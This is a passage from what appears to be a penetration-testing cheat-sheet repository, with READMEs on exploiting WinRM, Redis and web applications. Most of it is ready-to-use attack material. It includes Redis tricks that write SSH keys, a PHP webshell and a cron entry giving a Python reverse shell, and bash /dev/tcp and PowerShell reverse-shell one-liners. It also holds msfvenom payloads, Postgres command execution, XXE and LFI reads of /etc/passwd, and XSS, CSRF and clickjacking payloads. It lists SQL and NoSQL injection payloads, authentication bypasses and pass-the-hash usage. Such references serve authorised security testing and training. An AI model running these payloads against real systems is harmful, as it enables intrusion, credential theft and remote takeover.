EXISTS cmd_exec; 72 | CREATE TABLE cmd_exec(cmd_output TEXT); 73 | COPY cmd_exec FROM PROGRAM ''; 74 | SELECT * FROM cmd_exec; 75 | ``` 76 | 77 |
-------------------------------------------------------------------------------- /enum_and_exploit/tcp-5985-5986-winrm/README.md: -------------------------------------------------------------------------------- 1 | # Windows Remote Management _(WinRM)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Reverse shells](#reverse-shells) 4 | 5 | ## Initial enumeration 6 | ```bash 7 | nmap -vv -p 5985,5986 -sT 8 | ``` 9 | 10 | ## Reverse shells 11 | ```bash 12 | evil-winrm -i -u -p 13 | evil-winrm -i -u -H # Pass-the-hash with the NT hash 14 | ``` 15 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-6379-redis/README.md: -------------------------------------------------------------------------------- 1 | # Redis enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to a Redis database](#connecting-to-a-redis-database) 4 | * [Enumerating a database](#enumerating-a-database) 5 | * [Writing data to a file](#writing-data-to-a-file) 6 | 7 | ## Initial enumeration 8 | ```bash 9 | nmap -vv -p 6379 -sT --script=+redis* 10 | ``` 11 | 12 | ## Connecting to a Redis database 13 | ```bash 14 | redis-cli -h -p 6379 -a # Versions prior to Redis 6 (no ACL users) 15 | redis-cli -h -p 6379 --user default --pass 16 | ``` 17 | 18 | ## Enumerating a database 19 | - Get database info: 20 | ```bash 21 | INFO all 22 | ``` 23 | - Select a database: 24 | ```bash 25 | SELECT 26 | ``` 27 | - List keys: 28 | ```bash 29 | KEYS 30 | ``` 31 | - Get value for a key: 32 | ```bash 33 | GET 34 | ``` 35 | 36 | ## Writing data to a file 37 | - SSH RCE _(the dump is written as the OS user Redis runs as, so the target `.ssh` directory must already exist and be writable by it; `SAVE` replaces any existing `authorized_keys`)_: 38 | ```bash 39 | ssh-keygen -t rsa -C "kali@" # File path = ./id_rsa 40 | (echo -e "\n\n"; cat ./id_rsa.pub; echo -e "\n\n") | redis-cli -h -p 6379 -a -x set somekey # Store the PUBLIC key, padded with newlines so the binary RDB data around it does not corrupt the key line 41 | redis-cli -h -p 6379 -a 42 | 43 | CONFIG SET rdbcompression no 44 | CONFIG SET DIR /home//.ssh 45 | CONFIG SET DBFILENAME authorized_keys 46 | SAVE 47 | ``` 48 | - PHP RCE: 49 | ```bash 50 | redis-cli -h -p 6379 -a 51 | 52 | SET somekey "\n\n
\n\n" 53 | CONFIG SET rdbcompression no 54 | CONFIG SET DIR /var/www/html/ 55 | CONFIG SET DBFILENAME shell.php 56 | SAVE 57 | ``` 58 | - Crontab python RCE: 59 | ```bash 60 | redis-cli -h -p 6379 -a 61 | 62 | SET somekey "\n\n* * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n" 63 | CONFIG SET rdbcompression no 64 | CONFIG SET DIR /var/spool/cron/crontabs/ 65 | CONFIG SET DBFILENAME root 66 | SAVE 67 | ``` 68 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-80-443-http/README.md: -------------------------------------------------------------------------------- 1 | # Web enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Subdomain discovery](#subdomain-discovery) 4 | * [Verify working domains from a list](#verify-working-domains-from-a-list) 5 | * [Brute forcing](#brute-forcing) 6 | * [Path discovery](#path-discovery) 7 | * [Open Redirect](#open-redirect) 8 | * [Cross-site scripting _(XSS)_](#cross-site-scripting-xss) 9 | * [Prototype pollution](#prototype-pollution) 10 | * [Types](#types) 11 | * [PoC Examples](#poc-examples) 12 | * [Cross-site request forgery _(CSRF)_](#cross-site-request-forgery-csrf) 13 | * [Prerequisites](#prerequisites) 14 | * [Payload](#payload) 15 | * [Clickjacking](#clickjacking) 16 | * [Prerequisites](#prerequisites) 17 | * [Payload](#payload) 18 | * [Message Listeners](#message-listeners) 19 | * [File upload](#file-upload) 20 | * [XML external entity _(XXE)_](#xml-external-entity-xxe) 21 | * [Server-side request forgery _(SSRF)_](#server-side-request-forgery-ssrf) 22 | * [File inclusion](#file-inclusion) 23 | * [Local file inclusion _(LFI)_](#local-file-inclusion-lfi) 24 | * [Remote file inclusion _(RFI)_](#remote-file-inclusion-rfi) 25 | * [Command 
injection](#command-injection) 26 | * [SQL injection](#sql-injection) 27 | * [SQLI fuzzing](#sqli-fuzzing) 28 | * [SQLI autoenumeration](#sqli-autoenumeration) 29 | * [SQLI authentication bypass](#sqli-authentication-bypass) 30 | * [SQLI select payloads](#sqli-select-payloads) 31 | * [SQLI union-based](#sqli-union-based) 32 | * [SQLI error-based](#sqli-error-based) 33 | * [SQLI conditional payloads](#sqli-conditional-payloads) 34 | * [SQLI conditional ordering and grouping](#sqli-conditional-ordering-and-grouping) 35 | * [SQLI conditional error](#sqli-conditional-error) 36 | * [SQLI conditional sleep](#sqli-conditional-sleep) 37 | * [SQLI conditional batch query sleep](#sqli-conditional-batch-query-sleep) 38 | * [NoSQL injection](#nosql-injection) 39 | * [NoSQLI Fuzzing](#nosqli-fuzzing) 40 | * [NoSQLI authentication bypass](#nosqli-authentication-bypass) 41 | * [NoSQLI username/password brute-forcing](#nosqli-usernamepassword-brute-forcing) 42 | * [Server side template injection _(SSTI)_](#server-side-template-injection-ssti) 43 | * [Error-based information disclosure](#error-based-information-disclosure) 44 | * [Brute-forcing credentials](#brute-forcing-credentials) 45 | 46 | ## Initial enumeration 47 | ```bash 48 | nmap -vv -p 80,443 -sT --script=+http* # Other ports may also have an HTTP server running 49 | ``` 50 | 51 | 52 | ## Subdomain discovery 53 | ### Verify working domains from a list 54 | - `domains.txt` list after sublist3r or other Subdomain Finder: 55 | ```bash 56 | wget https://raw.githubusercontent.com/maksyche/pentest-everything/refs/heads/master/enum_and_exploit/tcp-80-443-http/domain_verifier.py \ 57 | && python3 ./domain_verifier.py 58 | ``` 59 | 60 | ### Brute forcing 61 | - CTFs _(don't forget to update word count)_: 62 | ```bash 63 | wfuzz -t 100 -w ~/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -H "Host: FUZZ." 
--hw 1 --hc 400 -u 64 | ``` 65 | - Slow one for real targets: 66 | ```bash 67 | wfuzz -t 1 -s 0.3 --req-delay 1 --conn-delay 1 -w ~/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -H "Host: FUZZ." --hw 1 --hc 400 -u 68 | ``` 69 | 70 | 71 | ## Path discovery 72 | - Slow scan for real targets _(it speeds up when links are extracted)_: 73 | ```bash 74 | feroxbuster --threads 1 --scan-limit 1 --rate-limit 1 -d 4 -u -w ~/SecLists/Discovery/Web-Content/common.txt -x html --extract-links 75 | ``` 76 | - Scan common paths with extensions: 77 | ```bash 78 | feroxbuster -t 50 -L 2 -d 4 -u -w ~/SecLists/Discovery/Web-Content/common.txt -x html,md,txt --extract-links 79 | ``` 80 | - Scan more paths with common web extensions: 81 | ```bash 82 | feroxbuster -t 100 -L 1 -d 1 -u -w ~/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,php,htm,asp,aspx,jsp,cgi 83 | ``` 84 | - Scan more paths with common file extensions: 85 | ```bash 86 | feroxbuster -t 100 -L 1 -d 1 -u -w ~/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x bak,php.bak,php.swp,txt,log,xml,pdf,doc,docs,sh,pl,py,exe,jpeg,jpg,png,zip,tar.gz 87 | ``` 88 | 89 | 90 | ## Open Redirect 91 | - Look for all things that say "redirect"; 92 | - Often works in auth flows (might lead to token or PII stealing in some cases); 93 | - Try simple payloads: 94 | - `redirectURL=https://evil-website.com\victim-website.com` 95 | - `redirectURL=https://evil-website.com/https://victim-website.com` 96 | - `redirectURL=victim-website.com@https://evil-website.com` 97 | - `redirectURL=https://evil-website.com?https://victim-website.com` 98 | - Try upgrading to XSS `javascript:alert(1)` 99 | 100 | 101 | ## Cross-site scripting _(XSS)_ 102 | - Simple PoC of encoding absence (search for `test123` in inspect to see what got encoded and where the payload ended up): 103 | ```html 104 | test123'test123"test123
test 105 | ``` 106 | - Payload examples (nice ones here: https://github.com/Edr4/XSS-Bypass-Filters): 107 | - Inside an html tag: [tag event examples](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet), `">`, `'>`; 108 | - Between tags: ``; 109 | - Between `` tags: `';js_code;//`, `";js_code;//`, ``, ``, etc; 110 | - In href: `javascript:alert(1);` or `javascript://example.com/test%0aalert(1)` 111 | - In backticks: `${alert(1)}` 112 | - Iframe src: `data:text/html;valid_website.com;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==` 113 | - Angular (`ng-app`): `{{1+2+'test123'}}` 114 | - 2 parameters with unencoded `\` character on one line in a script: `firstparameter\"` ... `js_code //` 115 | - If you try new line characters (`%0A` or `%0D`) you'll break the quotes, but you won't be able to close them. 116 | - When JS code inside `_blind_xss\"> 136 | ``` 137 | 138 | 139 | ## Prototype pollution 140 | Affects both frontend and backend. May lead to code execution _(XSS and RCE)_ with correct gadgets. Backend attack 141 | attempts might fully kill the instance. 
142 | ### Types 143 | - Simple `__proto__` injection: 144 | ```js 145 | const payload = '__proto__'; 146 | const obj = {"test":"123"}; 147 | const arr = ["firts", "second", "third"]; 148 | obj.__proto__.polluted = 'pwned' 149 | obj[payload]['polluted'] = 'pwned'; 150 | Object.prototype.polluted = 'pwned' 151 | console.log({}.polluted); // Output: "pwned" for all 3 pollution options 152 | console.log([].polluted); // Output: "pwned" for all 3 pollution options 153 | console.log(arr['polluted']); // Output: "pwned" for all 3 pollution options, even for arrays 154 | ``` 155 | - `__proto__` injection in Arrays: 156 | ```js 157 | const payload = '__proto__'; 158 | const arr = ["firts", "second", "third"]; 159 | arr[payload]['polluted'] = 'pwned'; 160 | console.log([]['polluted']); // Output: "pwned" 161 | console.log([].polluted); // Output: "pwned" 162 | console.log({}.polluted); // Output: "undefined", cause only Array.prototype is affected 163 | ``` 164 | - `constructor.prototype` injection: 165 | ```js 166 | const payload = '__proto__'; 167 | const obj = {"test":"123"}; 168 | obj['constructor']['prototype']['polluted'] = 'pwned' 169 | console.log({}.polluted); // Output: "pwned" 170 | ``` 171 | - improperly implemented `merge()` or `clone()` functions (especially after `JSON.parse()`): 172 | ```js 173 | const someLib = await import('somelib'); 174 | var maliciousJson = JSON.parse('{"__proto__":{"polluted":true}}'); 175 | var victim = {} 176 | console.log(JSON.stringify(victim.__proto__)); // {} 177 | someLib.merge({}, maliciousJson) 178 | console.log(JSON.stringify(victim.__proto__)); // {"polluted":true} 179 | ``` 180 | ### PoC Examples 181 | - URL parameters: 182 | ``` 183 | ?__proto__[evilProperty]=payload 184 | ?constructor[prototype][evilProperty]=payload 185 | ?__proto__.evilProperty=payload 186 | ?constructor.prototype.evilProperty=payload 187 | #__proto__[evilProperty]=payload 188 | ``` 189 | - JSON body: 190 | ```json 191 | { 192 | "__proto__": { 193 | 
"polluted": true 194 | } 195 | } 196 | ``` 197 | - Web Messages: 198 | ```js 199 | window.postMessage('{"__proto__":{"polluted":true}}', "*") 200 | ``` 201 | 202 | 203 | ## Cross-site request forgery _(CSRF)_ 204 | ### Prerequisites 205 | - Cookie-based auth; 206 | - If the important cookie has `SameSite=None`: 207 | - No CSRF token exists (check headers, body, cookies); 208 | - Token, but not tied to a session or not unique (try using a token from another session); 209 | - Token, but tied to some random cookie (vulnerable with [cookie injection](#cookie-injection)); 210 | - Token exists, but the check is skipped if token is absent; 211 | - Double Submit (same tokens or just tied to each other). 212 | - If `SameSite=Lax` (or not set): 213 | - Check if something can be done with GET requests (use html form with `method="get"`); 214 | - Check if the cookie can be refreshed (for example, but triggering OAuth flow). If the cookie is fresh (<120s) and 215 | the `SameSite` is not set, `POST` requests can be executed; 216 | - Subdomains are same site; 217 | - Also, some servers check `Referer` header; 218 | ### Payload 219 | ```html 220 |
221 | 222 |
223 | 226 | ``` 227 | 228 | 229 | ## Clickjacking 230 | ### Prerequisites 231 | - `X-Frame-Options` missing, or `ALLOW-FROM` a controlled origin, or `ALLOWALL` (non-standard). It doesn't work with 232 | ``; 233 | - `CSP` headers not configured properly; 234 | - Find a button that can be clicked; 235 | - See if there are any frame busting (like prevent clicking on transparent frames). Can be bypassed with 236 | [sandbox](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#sandbox); 237 | - See which cookies are available in the iframe: 238 | - Parent page cannot access iframe's cookies and visa-versa if they are from different origins (SOP policy); 239 | - Only `SameSite=None` cookies will be available inside the embedded iframe; 240 | ### Payload 241 | ```html 242 | 243 | 244 | 273 | 274 | 275 |
276 |

Click here!

277 |
278 | 279 |
280 |
281 | 283 | 284 | 285 | ``` 286 | 287 | 288 | ## Message Listeners 289 | - `Cross-Origin-Opener-Policy` is missing or misconfigured; 290 | - Check for potentially vulnerable message listeners: 291 | - `.addEventListener("message"` 292 | - `.addEventListener(` 293 | - `.onmessage` 294 | - Debug the listener in a console: `window.postMessage("test", "*")`; 295 | - Search for possible [Prototype pollution](#prototype-pollution), especially when parsing json. 296 | - Iframes of the target window are not accessible (SOP); 297 | - Open a pop-up window and send a payload in `postMessage` on a malicious web page (it opens with all cookies): 298 | ```html 299 | 300 | 301 | 302 | 303 | 304 | Malicious Page 305 | 306 | 307 |

Click anywhere

308 | 341 | 342 | 343 | ``` 344 | 345 | 346 | ## File upload 347 | - Filename path issues: 348 | - Add `../../` to the filename to try storing it into a random location; 349 | - Even if the file is renamed, it might be temporarily stored with the name provided in the request; 350 | - Bypass filters: 351 | - Check if it's a whitelist, or a blacklist filter by passing something like: `jpg_but_bullshit.etrhbdfeqt`. 352 | - Use an inner extension: `file.jpg.php` 353 | - Add magic numbers: https://gist.github.com/leommoore/f9e57ba2aa4bf197ebc5 354 | 355 | - Msfvenom common web reverse shells (do not work well a without metasploit listener): 356 | ```bash 357 | msfvenom -p php/reverse_php LHOST= LPORT=443 -f raw > shell.php 358 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f asp > shell.asp 359 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f aspx > shell.aspx 360 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f raw > shell.jsp 361 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f war > shell.war 362 | ``` 363 | - Simple PHP reverse shell: 364 | ```php 365 | 366 | ``` 367 | ``` 368 | /?c=bash+-c+"bash+-i+>%26+/dev/tcp//443+0>%261" 369 | ``` 370 | ``` 371 | /?c=powershell+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient('',443)%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" 372 | ``` 373 | - Or simplified (or try others from https://www.revshells.com/ if nothing works): 374 | ```php 375 | & /dev/tcp//443 0>&1"'); ?> 376 | ``` 377 | 378 | 379 | ## XML external entity _(XXE)_ 380 | - PoC: 381 | 
```xml 382 | 383 | ]> 384 | 385 | &xxe; 386 | 387 | ``` 388 | - Blind PoC: 389 | ```bash 390 | sudo nc -lvnp 443 391 | ``` 392 | ```xml 393 | 394 | :443"> ]> 395 | 396 | &xxe; 397 | 398 | ``` 399 | - A simple payload to perform LFI attack: 400 | ```xml 401 | 402 | ]> 403 | 404 | &xxe; 405 | 406 | ``` 407 | - A simple payload to perform LFI attack using php filters: 408 | ```xml 409 | 410 | ]> 411 | 412 | &xxe; 413 | 414 | ``` 415 | - A simple payload to perform SSRF attack: 416 | ```xml 417 | 418 | ]> 419 | 420 | &xxe; 421 | 422 | ``` 423 | - Payloads: 424 | - https://github.com/payloadbox/xxe-injection-payload-list 425 | - https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity 426 | 427 | 428 | ## Server-side request forgery _(SSRF)_ 429 | - A simple payload: 430 | ``` 431 | http://127.0.0.1:/ 432 | ``` 433 | - An advanced payload _(using ipv6 or decimal value to bypass filters)_: 434 | ``` 435 | http://[::]:/ 436 | http://:::/ 437 | http://2130706433:/ 438 | ``` 439 | - Read a local file: 440 | ``` 441 | file:// 442 | ``` 443 | - Try different URI schemes (especially project-dependant like `jar:`): 444 | - https://en.wikipedia.org/wiki/List_of_URI_schemes 445 | - https://www.iana.org/assignments/uri-schemes/uri-schemes.xhtml 446 | 447 | 448 | ## File inclusion 449 | ### Local file inclusion _(LFI)_ 450 | - Fuzzing URL params: 451 | ```bash 452 | wfuzz -c -z file,/Users/kali/wfuzz_wordlist/Injections/Traversal.txt --basic : -X -u ?=FUZZ 453 | ``` 454 | - Basic PoC (easy to execute with `curl -s --path-as-is http://:/`): 455 | ```bash 456 | ../../../../../../../../../etc/passwd 457 | ../../../../../../../../../etc/passwd%00 458 | ....//....//....//....//....//....//....//....//....//etc/passwd 459 | ....//....//....//....//....//....//....//....//....//etc/passwd%00 460 | ..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 461 | ..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00 462 | ``` 463 | 
- Reading a PHP file instead of executing it: 464 | ```php 465 | include("php://filter/convert.base64-encode/resource="); 466 | ``` 467 | 468 | 469 | ### Remote file inclusion _(RFI)_ 470 | - Basic PoC: 471 | ```bash 472 | sudo python3 -m http.server 80 473 | http:///test 474 | http:///test%00 475 | http:%252f%252f%252ftest 476 | http:%252f%252f%252ftest%00 477 | ``` 478 | - Bypassing URL prohibition: 479 | ```bash 480 | data:text/plain,testing 481 | data:text/plain, 482 | ``` 483 | 484 | 485 | ## Command injection 486 | - PoC _(both Windows and Linux)_: 487 | ```bash 488 | whoami 489 | ``` 490 | - Blind PoC: 491 | ```bash 492 | sudo tcpdump ip proto \\icmp -i tun0 493 | 494 | ping -c 1 495 | ping -n 1 # Windows 496 | ``` 497 | - Test blind command injection by redirecting output to a file that can be opened in the webserver: 498 | ```bash 499 | whoami > /var/www/static/ 500 | whoami > /var/www/images/ 501 | ``` 502 | 503 | 504 | ## SQL injection 505 | ### SQLI fuzzing 506 | ```bash 507 | wfuzz -c -z file,/Users/kali/wfuzz_wordlist/Injections/SQL.txt -d 'username=FUZZ&password=anypassword' -u 508 | wfuzz -c -z file,/Users/kali/wfuzz_wordlist/Injections/SQL.txt,urlencode --basic : -X -u '?=FUZZ' 509 | wfuzz -c -z file,/Users/kali/wfuzz_wordlist/Injections/SQL.txt --basic : -X -H '
: FUZZ' 510 | wfuzz -c -z file,/Users/kali/wfuzz_wordlist/Injections/SQL.txt,urlencode --basic : -X -b '=FUZZ' 511 | ``` 512 | 513 | ### SQLI autoenumeration 514 | - Copy raw HTTP request into a `request.txt` file and retrieve basic DB info 515 | ```bash 516 | sqlmap -r request.txt -p --risk=3 --level=5 --users --passwords --privileges --dbs 517 | ``` 518 | - Fetch tables of the database: 519 | ```bash 520 | sqlmap -r request.txt -p --risk=3 --level=5 -D --tables 521 | ``` 522 | - Dump a table: 523 | ```bash 524 | sqlmap -r request.txt -p --risk=3 --level=5 -D -T --dump 525 | ``` 526 | 527 | ### SQLI authentication bypass 528 | ```bash 529 | wget https://raw.githubusercontent.com/payloadbox/sql-injection-payload-list/master/Intruder/exploit/Auth_Bypass.txt 530 | wfuzz -c -z file,./Auth_Bypass.txt -d 'username=FUZZ&password=anypassword' -u 531 | ``` 532 | 533 | ### SQLI select payloads 534 | - Guess database type to enumerate: 535 | - [MySQL enumeration](../tcp-3306-mysql/README.md#enumerating-a-database) 536 | - [PostgreSQL enumeration](../tcp-5432-pgsql/README.md#enumerating-a-database) 537 | - [MSSQL enumeration](../tcp-1433-mssql/README.md#enumerating-a-database) 538 | - [Oracle DB enumeration](../tcp-1521-oracle_db/README.md#enumerating-a-database) 539 | 540 | - Concatenate result columns into a single one: 541 | ```SQL 542 | SELECT concat(,char(58),) FROM -- MySQL 543 | SELECT ||chr(58)|| FROM -- PostgreSQL 544 | SELECT +char(58)+ FROM -- MSSQL 545 | SELECT ||chr(58)|| FROM -- Oracle 546 | ``` 547 | - Usecases _(select payloads can be used with different SQL injection types or by themselves in these cases)_: 548 | ```SQL 549 | UPDATE table SET column = ''||() -- MySQL(if PIPES_AS_CONCAT=true)/PostgreSQL/Oracle 550 | UPDATE table SET column = ''+() -- MSSQL 551 | 552 | INSERT INTO table (column) VALUES (''||()) -- MySQL(if PIPES_AS_CONCAT=true)/PostgreSQL/Oracle 553 | INSERT INTO table (column) VALUES (''+()) -- MSSQL 554 | ``` 555 | 556 | ### SQLI union-based 
557 | - Get column number: 558 | ```SQL 559 | ORDER BY 560 | 561 | UNION SELECT NULL,NULL -- MySQL/PostgreSQL/MSSQL 562 | UNION SELECT NULL,NULL FROM DUAL -- Oracle 563 | ``` 564 | - Find which column can return a string: 565 | ```SQL 566 | UNION SELECT NULL,char(97) -- MySQL/MSSQL 567 | UNION SELECT NULL,chr(97) -- PostgreSQL 568 | UNION SELECT NULL,chr(97) FROM DUAL -- Oracle 569 | ``` 570 | - Get some data: 571 | ```SQL 572 | UNION SELECT NULL,() -- MySQL/MSSQL/PostgreSQL 573 | UNION SELECT NULL,() FROM DUAL -- Oracle (if select payload doesn't have FROM statement) 574 | ``` 575 | - Usecases: 576 | ```SQL 577 | SELECT column FROM table WHERE another_column = 'wrong_value' -- SELECT WHERE 578 | SELECT column FROM table GROUP BY column -- SELECT GROUP BY. You may have to skip original query response in the result set. 579 | SELECT column FROM table GROUP BY column HAVING column = 'wrong_value' -- SELECT HAVING 580 | SELECT column FROM table WHERE any_column = 'wrong_value' -- SELECT TABLE NAME 581 | ``` 582 | 583 | ### SQLI error-based 584 | - Proof of concept: 585 | ```SQL 586 | extractvalue(0x00,concat(0x3f,(concat(char(112),char(114),char(111),char(111),char(102))))) -- MySQL 587 | cast(chr(112)||chr(114)||chr(111)||chr(111)||chr(102) AS INTEGER) -- PostgreSQL/Oracle 588 | cast(char(112)+char(114)+char(111)+char(111)+char(102) AS INTEGER) -- MSSQL 589 | ``` 590 | - Get some data: 591 | ```SQL 592 | extractvalue(0x00,concat(0x3f,())) -- MySQL. Output is limited to 31 characters so better use substring(column_name,1,30) in select payloads. 
593 | cast(() AS INTEGER) -- PostgreSQL/Oracle/MSSQL 594 | ``` 595 | - Usecases: 596 | ```SQL 597 | SELECT column FROM table WHERE another_column = 'any_value' AND -- SELECT WHERE 598 | SELECT column FROM table ORDER BY -- SELECT ORDER BY 599 | SELECT column FROM table GROUP BY -- SELECT GROUP BY 600 | SELECT column FROM table GROUP BY column HAVING column = 'any_value' AND -- SELECT HAVING 601 | SELECT column FROM table WHERE -- SELECT TABLE NAME 602 | 603 | UPDATE table SET column = ''||() -- UPDATE. MySQL(used as 'OR' if PIPES_AS_CONCAT=false)/PostgreSQL/Oracle 604 | UPDATE table SET column = ''+() -- UPDATE. MSSQL 605 | UPDATE table SET column = 'FALSE' AND -- UPDATE 606 | UPDATE table SET column = 'value' WHERE another_column = 'any_value' AND -- UPDATE WHERE 607 | 608 | INSERT INTO table (column) VALUES (''||()) -- INSERT. MySQL(used as 'OR' if PIPES_AS_CONCAT=false)/PostgreSQL/Oracle 609 | INSERT INTO table (column) VALUES (''+()) -- INSERT. MSSQL 610 | INSERT INTO table (column) VALUES ('FALSE' AND ) -- INSERT 611 | ``` 612 | 613 | ### SQLI conditional payloads 614 | - Proof of concept: 615 | ```SQL 616 | 1=0 617 | '1'='0' -- Don't comment the rest of the query, just don't close the last quote to keep everything from an original query. 
618 | ``` 619 | - Get data length: 620 | ```SQL 621 | length(())>1 -- MySQL/PostgreSQL/Oracle 622 | len((1 -- MSSQL 623 | ``` 624 | - Get data characters one by one: 625 | ```SQL 626 | substring((),1,1) = 'a' -- MySQL/PostgreSQL/MSSQL 627 | substr((),1,1) = 'a' -- Oracle 628 | ``` 629 | - Compare to this data set _(or `char(32...126)` to bypass filters)_ using **Burp Intruder Brute Forcer**: 630 | ``` 631 | abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ 632 | ``` 633 | - Usecases _(conditional payloads can be used in different conditional SQL injection types or by themselves in these cases)_: 634 | ```SQL 635 | SELECT column FROM table WHERE another_column = 'correct_value' AND -- SELECT WHERE 636 | SELECT column FROM table WHERE -- SELECT TABLE NAME 637 | SELECT column FROM table GROUP BY column HAVING column = 'any_value' AND -- SELECT HAVING 638 | UPDATE table SET column = 'value' WHERE another_column = 'any_value' AND -- UPDATE WHERE 639 | ``` 640 | 641 | ### SQLI conditional ordering and grouping 642 | - In `SELECT ORDER BY` and `SELECT GROUP BY` locations conditional payloads can be used to change ordering/grouping: 643 | ```SQL 644 | (if((), , )) -- MySQL 645 | (CASE WHEN() THEN ELSE END) -- PostgreSQL/MSSQL/Oracle 646 | ``` 647 | 648 | ### SQLI conditional error 649 | - Get some data: 650 | ```SQL 651 | (if((),(SELECT table_name FROM information_schema.tables),TRUE)) -- MySQL. Multiple return value error. 
652 | (CASE WHEN() THEN cast(1/0 as VARCHAR) ELSE chr(97) END)=chr(97) -- PostgreSQL 653 | (CASE WHEN() THEN cast(1/0 as VARCHAR) ELSE char(97) END)=char(97) -- MSSQL 654 | (CASE WHEN() THEN to_char(1/0) ELSE chr(97) END)=chr(97) -- Oracle 655 | ``` 656 | - Usecases: 657 | ```SQL 658 | SELECT column FROM table WHERE another_column = 'correct_value' AND -- SELECT WHERE 659 | SELECT column FROM table WHERE -- SELECT TABLE NAME 660 | SELECT column FROM table GROUP BY column HAVING column = 'any_value' AND -- SELECT HAVING 661 | 662 | UPDATE table SET column = 'value' WHERE another_column = 'any_value' AND -- UPDATE WHERE 663 | ``` 664 | 665 | ### SQLI conditional sleep 666 | - Get some data _(returns true regardless of conditions, but sleeps on every row, so consider limiting the result set)_: 667 | ```SQL 668 | IF((), sleep(5), sleep(0))=sleep(0) -- MySQL 669 | (CASE WHEN() THEN chr(97)||pg_sleep(5) ELSE chr(97) END)=chr(97) -- PostgreSQL 670 | ``` 671 | - Locations: 672 | ```SQL 673 | SELECT column FROM table WHERE another_column = 'correct_value' AND -- SELECT WHERE 674 | SELECT column FROM table WHERE -- SELECT TABLE NAME 675 | SELECT column FROM table GROUP BY column HAVING column = 'any_value' AND -- SELECT HAVING 676 | 677 | UPDATE table SET column = 'value' WHERE another_column = 'any_value' AND -- UPDATE WHERE 678 | ``` 679 | 680 | ### SQLI conditional batch query sleep 681 | - Get some data _(can be used as batch queries only)_: 682 | ```SQL 683 | ; SELECT IF((),sleep(5),sleep(0)) -- MySQL. Only a couple of PHP and Python APIs support this. 684 | ; IF () WAITFOR DELAY '0:0:5' -- MSSQL. Time cannot be replaced with chars. 
685 | ; SELECT CASE WHEN () THEN pg_sleep(5) ELSE pg_sleep(0) END -- PostgreSQL 686 | ``` 687 | 688 | 689 | ## NoSQL injection 690 | ### NoSQLI Fuzzing 691 | ```bash 692 | wget https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/NoSQL%20Injection/Intruder/NoSQL.txt 693 | wfuzz -c -w ./NoSQL.txt -d 'username=FUZZ&password=anypassword' -u 694 | ``` 695 | 696 | ### NoSQLI authentication bypass 697 | - Form data: 698 | ``` 699 | username[$ne]=wrongdata&password[$ne]=wrongdata 700 | username[$regex]=a.*&password[$ne]=wrongdata 701 | username[$gt]=admin&password[$ne]=wrongdata 702 | ``` 703 | - Json: 704 | ```json 705 | {"username": {"$ne": null}, "password": {"$ne": null}} 706 | {"username": {"$ne": "wrongdata"}, "password": {"$ne": "wrongdata"}} 707 | {"username": {"$gt": undefined}, "password": {"$gt": undefined}} 708 | {"username": {"$gt": ""}, "password": {"$gt": ""}} 709 | ``` 710 | 711 | ### NoSQLI username/password brute-forcing 712 | - Form data: 713 | ```bash 714 | echo 'a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 9 ! " # \$ % %26 '"'"' \( \) \* \+ , - \. / : ; < = > \? @ \[ \\\\ \] \^ _ ` \{ \| \} ~' > nosqli_regex.txt # Regex special characters are escaped 715 | sed 's/\s\+/\n/g' -i nosqli_regex.txt 716 | 717 | wfuzz -c -z file,./nosqli_regex.txt -d 'username[$regex]=^FUZZ.*&password[$ne]=wrongdata' -u 718 | wfuzz -c -z file,./nosqli_regex.txt -d 'username=&password[$regex]=^FUZZ.*' -u 719 | ``` 720 | - Json: 721 | ```bash 722 | echo 'a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 9 ! " # \$ % & '"'"' \( \) \* \+ , - \. / : ; < = > \? 
